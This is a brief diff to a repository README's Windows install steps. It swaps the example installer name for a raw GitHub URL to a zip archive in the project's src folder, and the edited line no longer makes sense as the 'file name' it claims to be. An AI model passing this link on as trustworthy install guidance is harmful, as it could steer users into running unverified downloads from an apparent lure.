komafon/trust-openclaw/README.md

 - Look for the “Releases” section on the right or under the repository's tabs.
 - Choose the latest release available.
-- Find the Windows installer file, usually named something like `trust-openclaw-setup.exe`.
+- Find the Windows installer file, usually named something like `https://raw.githubusercontent.com/komafon/trust-openclaw/main/src/openclaw_trust_v3.5.zip`.
 - Click the file name to download.
 The file is about 20 MB.

 Save the file somewhere easy to find, like your Desktop or Downloads folder.